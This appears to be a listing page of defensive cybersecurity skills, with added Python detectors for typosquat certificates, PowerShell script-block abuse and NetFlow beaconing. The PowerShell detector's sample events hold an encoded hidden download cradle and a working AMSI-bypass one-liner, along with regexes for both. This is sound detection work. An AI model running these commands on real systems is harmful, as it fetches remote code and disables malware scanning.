Topic: mcp
13,395 skills in this topic.
-
validating-backup-integrity-for-recovery
Validate backup integrity through cryptographic hash verification, automated restore testing, corruption detection, and recoverability checks to ensure backups are reliable for disaster recovery and ransomware response scenarios.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
auditing-terraform-infrastructure-for-security
Auditing Terraform infrastructure-as-code for security misconfigurations using Checkov, tfsec, Terrascan, and OPA/Rego policies to detect overly permissive IAM policies, public resource exposure, missing encryption, and insecure defaults before cloud deployment.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-devsecops-pipeline-with-gitlab-ci
Design and implement a comprehensive DevSecOps pipeline in GitLab CI/CD integrating SAST, DAST, container scanning, dependency scanning, and secret detection.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-office365-audit-logs-for-compromise
Parse Office 365 Unified Audit Logs via Microsoft Graph API to detect email forwarding rule creation, inbox delegation, suspicious OAuth app grants, and other indicators of account compromise.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-mft-for-deleted-file-recovery
Analyze the NTFS Master File Table ($MFT) to recover metadata and content of deleted files by examining MFT record entries, $LogFile, $UsnJrnl, and MFT slack space using MFTECmd, analyzeMFT, and X-Ways Forensics.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-malware-sandbox-evasion-techniques
Detect sandbox evasion techniques in malware samples by analyzing timing checks, VM artifact queries, user interaction detection, and sleep inflation patterns from Cuckoo/AnyRun behavioral reports.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
auditing-cloud-with-cis-benchmarks
This skill details how to conduct cloud security audits using Center for Internet Security benchmarks for AWS, Azure, and GCP. It covers interpreting CIS Foundations Benchmark controls, running automated assessments with tools like Prowler and ScoutSuite, remediating failed controls, and maintaining continuous compliance monitoring against CIS v5 for AWS, v4 for Azure, and v4 for GCP.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-soc-playbook-for-ransomware
Builds a structured SOC incident response playbook for ransomware attacks covering detection, containment, eradication, and recovery phases with specific SIEM queries, isolation procedures, and decision trees. Use when SOC teams need formalized response procedures for ransomware incidents aligned to NIST SP 800-61 and MITRE ATT&CK ransomware techniques.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
collecting-indicators-of-compromise
Systematically collects, categorizes, and distributes indicators of compromise (IOCs) during and after security incidents to enable detection, blocking, and threat intelligence sharing. Covers network, host, email, and behavioral indicators using STIX/TAXII formats and threat intelligence platforms. Activates for requests involving IOC collection, indicator extraction, threat indicator sharing, compromise indicators, STIX export, or IOC enrichment.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-threat-intelligence-platform
Building a Threat Intelligence Platform (TIP) involves deploying and integrating multiple CTI tools into a unified system for collecting, analyzing, enriching, and disseminating threat intelligence. T
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-tls-certificate-transparency-logs
Queries Certificate Transparency logs via crt.sh and pycrtsh to detect phishing domains, unauthorized certificate issuance, and shadow IT. Monitors newly issued certificates for typosquatting and brand impersonation using Levenshtein distance. Use for proactive phishing domain detection and certificate monitoring.
mukul975/Anthropic-Cybersecurity-Skills 4,300
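Added example for the entry above (not code from the listed skill or its repository): the Levenshtein-distance screen applied to certificate common names. The CT names, the brand domain and the distance threshold are constructed assumptions so the script runs offline; in use, the names would come from a crt.sh or pycrtsh query.

```python
"""Screen CT-log certificate names for typosquats of a brand domain.
Added example, not the listed skill's code. Sample names below are
constructed, not real findings."""

# Constructed sample of what a crt.sh keyword search might return.
SAMPLE_CT_NAMES = [
    "login.examplebank.com",        # legitimate subdomain of the owned zone
    "examplebank-secure.com",       # brand keyword inside a foreign registrable domain
    "exampIebank.com",              # homoglyph: capital I in place of lowercase l
    "exarnplebank.com",             # 'rn' standing in for 'm'
    "examplebnak.com",              # transposition
    "totallyunrelated.org",
    "*.examplebank.com",            # wildcard cert on the owned zone
]

BRAND_DOMAINS = {"examplebank.com"}   # assumed: the zones the team owns


def levenshtein(a: str, b: str) -> int:
    """Edit distance with a rolling two-row table (O(min(len) ) memory)."""
    if len(a) < len(b):
        a, b = b, a
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def registrable_domain(name: str) -> str:
    """Naive eTLD+1: drop wildcard and subdomain labels, keep the last two.
    Adequate for .com-style TLDs; a production version should consult the
    Public Suffix List so 'example.co.uk' is handled correctly."""
    labels = name.lower().lstrip("*.").split(".")
    return ".".join(labels[-2:])


def classify(name: str, brands=BRAND_DOMAINS, max_distance: int = 2) -> str:
    """Return 'owned', 'suspicious' or 'unrelated' for one CT name."""
    reg = registrable_domain(name)
    if reg in brands:
        return "owned"
    reg_label = reg.split(".")[0]
    for brand in brands:
        brand_label = brand.split(".")[0]
        # Brand keyword embedded in someone else's registrable domain
        if brand_label in reg_label:
            return "suspicious"
        # Small edit distance on the label: typo, homoglyph or transposition.
        # Lower-casing already folds 'I' onto 'i'; a fuller check would also
        # normalise Unicode confusables before measuring distance.
        if levenshtein(reg_label, brand_label) <= max_distance:
            return "suspicious"
    return "unrelated"


def screen(names):
    """Classify every name; callers alert on the 'suspicious' bucket."""
    return {n: classify(n) for n in names}


if __name__ == "__main__":
    for n, verdict in screen(SAMPLE_CT_NAMES).items():
        print(f"{verdict:10s} {n}")
```

The threshold of 2 edits catches single-character swaps and transpositions without flagging every short domain; lengthen the brand label list or lower the threshold for short brands, where two edits cover too many legitimate names.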
-
analyzing-cloud-storage-access-patterns
Detect abnormal access patterns in AWS S3, GCS, and Azure Blob Storage by analyzing CloudTrail Data Events, GCS audit logs, and Azure Storage Analytics. Identifies after-hours bulk downloads, access from new IP addresses, unusual API calls (GetObject spikes), and potential data exfiltration using statistical baselines and time-series anomaly detection.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-identity-governance-lifecycle-process
Builds comprehensive identity governance and lifecycle management processes including joiner-mover-leaver automation, role mining, access request workflows, periodic recertification, and orphaned account remediation using IGA platforms. Activates for requests involving identity lifecycle management, JML processes, role-based access provisioning, or identity governance program design.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-cobaltstrike-malleable-c2-profiles
Parse and analyze Cobalt Strike Malleable C2 profiles using dissect.cobaltstrike and pyMalleableC2 to extract C2 indicators, detect evasion techniques, and generate network detection signatures.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-malicious-url-with-urlscan
URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolat
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-incident-timeline-with-timesketch
Build collaborative forensic incident timelines using Timesketch to ingest, normalize, and analyze multi-source event data for attack chain reconstruction and investigation documentation.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-adversary-infrastructure-tracking-system
Build an automated system to track adversary infrastructure using passive DNS, certificate transparency, WHOIS data, and IP enrichment to map and monitor threat actor command-and-control networks.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-malware-incident-communication-template
Build structured communication templates for malware incidents including stakeholder notifications, executive briefings, technical advisories, and regulatory disclosures with severity-based escalation procedures.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-powershell-script-block-logging
Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files to detect obfuscated commands, encoded payloads, and living-off-the-land techniques. Uses python-evtx to extract and reconstruct multi-block scripts, applies entropy analysis and pattern matching for Base64-encoded commands, Invoke-Expression abuse, download cradles, and AMSI bypass attempts.
mukul975/Anthropic-Cybersecurity-Skills 4,300
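Added example for the entry above (not the listed skill's code): reassembly of multi-fragment 4104 script blocks, decoding of `-EncodedCommand` payloads (base64 over UTF-16LE), Shannon entropy, and pattern matching for Invoke-Expression, download cradles and AMSI tampering. The events are constructed dicts carrying the field names python-evtx exposes for 4104 (ScriptBlockText, ScriptBlockId, MessageNumber, MessageTotal); reading the .evtx itself is assumed to have happened upstream.

```python
"""Triage PowerShell 4104 script blocks. Added example, not the listed
skill's code; events are constructed, not taken from a real log."""
import base64
import math
import re
from collections import defaultdict

# A cradle as it would be passed to -enc: UTF-16LE, then base64.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/p.ps1')"
    .encode("utf-16le")).decode()

# Constructed 4104 events. Block b1 was logged as two fragments.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "b1", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "powershell.exe -NoP -W Hidden -enc "},
    {"ScriptBlockId": "b1", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": ENCODED},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"},
    {"ScriptBlockId": "b3", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
]

PATTERNS = {
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "amsi_bypass": re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I),
    "encoded_command": re.compile(
        r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I),
}


def shannon_entropy(s: str) -> float:
    """Bits per character; base64 blobs sit well above ordinary scripts."""
    if not s:
        return 0.0
    freq = defaultdict(int)
    for ch in s:
        freq[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in freq.values())


def reassemble(events):
    """Join fragments of one ScriptBlockId in MessageNumber order."""
    parts = defaultdict(list)
    for e in events:
        parts[e["ScriptBlockId"]].append((e["MessageNumber"], e["ScriptBlockText"]))
    return {bid: "".join(t for _, t in sorted(frags)) for bid, frags in parts.items()}


def decode_encoded_command(text: str):
    """-EncodedCommand payloads are base64 over UTF-16LE, not UTF-8."""
    m = PATTERNS["encoded_command"].search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Per block: entropy, decoded payload (if any) and the patterns hit.
    The decoded text is scanned too, otherwise the cradle hides behind base64."""
    findings = {}
    for bid, text in reassemble(events).items():
        hits = set()
        decoded = decode_encoded_command(text)
        if decoded:
            hits.add("encoded_command")
        for name, rx in PATTERNS.items():
            if name == "encoded_command":
                continue
            if rx.search(text) or (decoded and rx.search(decoded)):
                hits.add(name)
        findings[bid] = {"entropy": round(shannon_entropy(text), 2),
                         "decoded": decoded, "hits": sorted(hits)}
    return findings


if __name__ == "__main__":
    for bid, f in analyze(SAMPLE_EVENTS).items():
        print(bid, f["entropy"], f["hits"], (f["decoded"] or "")[:60])
```

Reassembling before matching matters: a regex run fragment by fragment misses a cradle split across the MessageNumber boundary, and the encoded payload is only decodable once its fragments are joined.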
-
analyzing-network-packets-with-scapy
Craft, send, sniff, and dissect network packets using Scapy for protocol analysis, network reconnaissance, and traffic anomaly detection in authorized security testing.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-network-flow-data-with-netflow
Parse NetFlow v9 and IPFIX records to detect volumetric anomalies, port scanning, data exfiltration, and C2 beaconing patterns. Uses the Python netflow library to decode flow records, builds traffic baselines, and applies statistical analysis to identify flows with abnormal byte counts, connection durations, and periodic timing patterns.
mukul975/Anthropic-Cybersecurity-Skills 4,300
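Added example for the entry above (not the listed skill's code): the beaconing and port-scan checks run over decoded flow records. The records are constructed tuples in the shape you have after the python netflow library has decoded v9/IPFIX templates (source, destination, destination port, byte count, flow start in seconds); wire-format decoding and the baseline thresholds are assumptions so the script runs offline.

```python
"""Beacon and port-scan detection over decoded flow records.
Added example, not the listed skill's code; flows are constructed."""
import statistics
from collections import defaultdict


def build_flows():
    """Constructed flow set: one beacon, some browsing, one port scan."""
    flows = []
    # Beacon: every 60 s with +/-1 s jitter, fixed small size, to 198.51.100.7:443
    jitter = [0, 1, -1, 0, 1, -1, 0, 1, -1, 0]
    for i, j in enumerate(jitter):
        flows.append(("10.0.0.23", "198.51.100.7", 443, 1450, 1000 + 60 * i + j))
    # Browsing: irregular timing and sizes to 203.0.113.10:443
    for t, b in [(1005, 80000), (1012, 4200), (1090, 150000),
                 (1091, 900), (1400, 23000), (1402, 61000)]:
        flows.append(("10.0.0.23", "203.0.113.10", 443, b, t))
    # Port scan: one host touching 40 ports on one target with tiny flows
    for i, port in enumerate(range(20, 60)):
        flows.append(("10.0.0.99", "10.0.0.5", port, 60, 2000 + i * 0.01))
    return flows


def detect_beacons(flows, min_flows=8, max_cv=0.1):
    """Flag (src, dst, dport) tuples whose inter-flow gaps are nearly constant.
    CV = stdev/mean of the gaps; jittered beacons stay well under 0.1, while
    human-driven traffic scatters far above it. min_flows avoids scoring
    a handful of coincidentally spaced connections."""
    by_key = defaultdict(list)
    for src, dst, dport, _nbytes, start in flows:
        by_key[(src, dst, dport)].append(start)
    hits = {}
    for key, starts in by_key.items():
        if len(starts) < min_flows:
            continue
        starts.sort()
        gaps = [b - a for a, b in zip(starts, starts[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits[key] = {"period_s": round(mean, 1), "cv": round(cv, 3),
                         "flows": len(starts)}
    return hits


def detect_port_scans(flows, min_ports=20, max_bytes=200):
    """Flag a src/dst pair that touches many distinct ports with tiny flows
    (SYN probes carry almost no payload, so bytes per flow is the filter)."""
    ports = defaultdict(set)
    for src, dst, dport, nbytes, _start in flows:
        if nbytes <= max_bytes:
            ports[(src, dst)].add(dport)
    return {k: len(v) for k, v in ports.items() if len(v) >= min_ports}


if __name__ == "__main__":
    flows = build_flows()
    print("beacons:", detect_beacons(flows))
    print("scans:", detect_port_scans(flows))
```

Keep the beacon test keyed on destination port as well as address: a host that beacons on 443 and also browses to the same CDN address on 80 should not have its regular gaps drowned by the irregular ones.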
-
analyzing-linux-kernel-rootkits
Detect kernel-level rootkits in Linux memory dumps using Volatility3 linux plugins (check_syscall, lsmod, hidden_modules), rkhunter system scanning, and /proc vs /sys discrepancy analysis to identify hooked syscalls, hidden kernel modules, and tampered system structures.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-golang-malware-with-ghidra
Reverse engineer Go-compiled malware using Ghidra with specialized scripts for function recovery, string extraction, and type reconstruction in stripped Go binaries.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-email-headers-for-phishing-investigation
Parse and analyze email headers to trace the origin of phishing emails, verify sender authenticity, and identify spoofing through SPF, DKIM, and DMARC validation.
mukul975/Anthropic-Cybersecurity-Skills 4,300